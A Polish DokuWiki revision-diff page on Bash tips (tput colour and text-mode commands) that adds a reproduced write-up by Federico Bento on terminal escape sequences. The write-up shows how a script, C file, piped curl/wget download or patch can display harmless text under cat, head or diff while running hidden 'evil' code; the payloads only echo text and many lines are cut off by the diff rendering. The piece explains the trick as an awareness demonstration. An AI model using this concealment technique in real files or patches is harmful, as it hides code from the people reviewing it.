Różnice
Różnice między wybraną wersją a wersją aktualną.
Poprzednia rewizja po obu stronach Poprzednia wersja Nowa wersja | Poprzednia wersja | ||
linux:bash [2014/10/28 09:18] – [Other commands] flamenco | linux:bash [2022/05/22 10:38] (aktualna) – edycja zewnętrzna 127.0.0.1 | ||
---|---|---|---|
Linia 1: | Linia 1: | ||
====== BASH i okolice ====== | ====== BASH i okolice ====== | ||
- | ===== Kolorowanie tekstu w terminalu ===== | + | ===== Kolorowanie tekstu w terminalu |
Here is some more detail on the awesome tput command suggested in Ignacio' | Here is some more detail on the awesome tput command suggested in Ignacio' | ||
==== Colour commands ==== | ==== Colour commands ==== | ||
< | < | ||
- | tput setab [1-7] # Set the background colour using ANSI escape | + | # Set the background colour using ANSI escape |
- | tput setaf [1-7] # Set the foreground colour using ANSI escape | + | tput setab [1-7] |
+ | # Set the foreground colour using ANSI escape | ||
+ | tput setaf [1-7] | ||
</ | </ | ||
Colours are as follows: | Colours are as follows: | ||
Linia 21: | Linia 24: | ||
7 white | 7 white | ||
</ | </ | ||
- | There are also non-ANSI versions of the colour setting functions (setb instead of setab, and setf instead of setaf) which use different numbers, not given here. | + | There are also non-ANSI versions of the colour setting functions ('' |
==== Text mode commands ==== | ==== Text mode commands ==== | ||
Linia 68: | Linia 71: | ||
Looks like this on my Ubuntu terminal: | Looks like this on my Ubuntu terminal: | ||
- | '' | ||
{{: | {{: | ||
Linia 87: | Linia 89: | ||
* See '' | * See '' | ||
* See '' | * See '' | ||
+ | |||
+ | ===== Backup bashem ===== | ||
+ | |||
+ | http:// | ||
+ | |||
+ | |||
+ | |||
+ | ===== Ciekawostki ===== | ||
+ | |||
+ | ==== Federico Bento '' | ||
+ | |||
+ | |||
+ | So recently i've encountered a post by Kurt Seifried of RedHat on oss-sec' | ||
+ | |||
+ | This is a little misleading title, since escape sequences have been introduced circa 70's, so it's actually not that new. | ||
+ | |||
+ | How it technically works: | ||
+ | |||
+ | A terminal escape sequence is a special sequence of characters that is printed (like any other text). | ||
+ | |||
+ | If the terminal understands the sequence, it won't display the character-sequence, | ||
+ | |||
+ | While some people might already know what i'm going to present you, the majority I believe doesn' | ||
+ | |||
+ | <code bash> | ||
+ | $ printf '# | ||
+ | doing something very nice!\n' | ||
+ | $ chmod +x backdoor.sh | ||
+ | $ cat backdoor.sh | ||
+ | #!/bin/bash | ||
+ | echo doing something very nice! | ||
+ | $ ./ | ||
+ | doing something evil! | ||
+ | </ | ||
+ | |||
+ | As you can see, our beloved '' | ||
+ | interprets escape sequences. | ||
+ | |||
+ | <code bash> | ||
+ | $ head backdoor.sh | ||
+ | #!/bin/bash | ||
+ | echo doing something very nice! | ||
+ | |||
+ | $ tail backdoor.sh | ||
+ | #!/bin/bash | ||
+ | echo doing something very nice! | ||
+ | |||
+ | $ more backdoor.sh | ||
+ | #!/bin/bash | ||
+ | echo doing something very nice! | ||
+ | </ | ||
+ | |||
+ | It's not over yet! | ||
+ | |||
+ | <code bash> | ||
+ | $ curl 127.0.0.1/ | ||
+ | #!/bin/bash | ||
+ | echo doing something very nice! | ||
+ | |||
+ | $ wget -qO - 127.0.0.1/ | ||
+ | #!/bin/bash | ||
+ | echo doing something very nice! | ||
+ | </ | ||
+ | |||
+ | But if we pipe it into a shell... | ||
+ | |||
+ | <code bash> | ||
+ | $ curl -s 127.0.0.1/ | ||
+ | doing something evil! | ||
+ | |||
+ | $ wget -qO - 127.0.0.1/ | ||
+ | doing something evil! | ||
+ | </ | ||
+ | |||
+ | You might be thinking //"If I opened that in my browser, I would detect it being malicious!"// | ||
+ | |||
+ | Well, think again... | ||
+ | |||
+ | One can have all sorts of fun with user-agents, | ||
+ | |||
+ | I wouldn' | ||
+ | |||
+ | I wouldn' | ||
+ | |||
+ | It's no secret, most of us rely on '' | ||
+ | |||
+ | Here's another example with a '' | ||
+ | |||
+ | <code c> | ||
+ | $ printf '# | ||
+ | something evil\\n" | ||
+ | much... */ | ||
+ | 0; | ||
+ | $ cat nice.c | ||
+ | #include < | ||
+ | |||
+ | int main() | ||
+ | { | ||
+ | /* This simple program doesnt do much... */ | ||
+ | printf(" | ||
+ | return 0; | ||
+ | } | ||
+ | </ | ||
+ | <code bash> | ||
+ | $ gcc nice.c | ||
+ | $ ./a.out | ||
+ | doing something evil | ||
+ | doing something very nice | ||
+ | </ | ||
+ | |||
+ | '' | ||
+ | |||
+ | Going back to the first example, imagine I have a '' | ||
+ | |||
+ | <code bash> | ||
+ | $ cat backdoor.sh #evil file | ||
+ | #!/bin/bash | ||
+ | echo doing something very nice! | ||
+ | |||
+ | $ cat legit.sh #actually echoes doing something very nice! | ||
+ | #!/bin/bash | ||
+ | echo doing something very nice! | ||
+ | |||
+ | |||
+ | $ diff -Naur backdoor.sh legit.sh | ||
+ | --- backdoor.sh 2015-09-17 16: | ||
+ | +++ legit.sh 2015-09-17 16: | ||
+ | @@ -1,4 +1,2 @@ | ||
+ | #!/bin/bash | ||
+ | -echo doing something very nice! | ||
+ | +echo doing something very nice! | ||
+ | |||
+ | $ diff -Naur backdoor.sh legit.sh > file.patch | ||
+ | $ patch legit.sh -R file.patch | ||
+ | $ chmod +x legit.sh | ||
+ | $ ./legit.sh | ||
+ | doing something evil! | ||
+ | </ | ||
+ | |||
+ | === Hint: === | ||
+ | '' | ||
+ | |||
+ | |||
+ | s/ | ||
+ |